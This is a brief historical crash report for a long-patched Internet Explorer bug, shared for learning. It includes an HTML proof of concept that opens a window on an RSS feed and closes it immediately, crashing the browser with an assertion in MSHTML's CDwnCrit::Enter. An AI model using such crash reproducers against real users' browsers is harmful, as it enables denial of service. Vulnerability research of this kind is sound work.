A brief crash report. Opening a new window with RSS feed XML content and closing it immediately triggered an assertion failure in MSHTML!CDwnCrit::Enter.
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_newFeedsWindowClose</title>
</head>
<!-- feeds.xml is assumed to be an RSS document served next to this page; it is not part of the report. -->
<body onload="main()">
<script>
function main()
{
  // Open the feed in a new window; the browser hands the XML to its feed viewer.
  var win = window.open("feeds.xml");
  // Close the window before the feed viewer has finished initializing.
  win.close();
}
</script>
</body>
</html>
The crash had unknown exploitability. Closing the window while the feed viewer was still initializing left a download context (CDwnCrit) in an inconsistent state, triggering the assertion at MSHTML!CDwnCrit::Enter+0xff. Reproduction was intermittent and sometimes took a couple of attempts.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.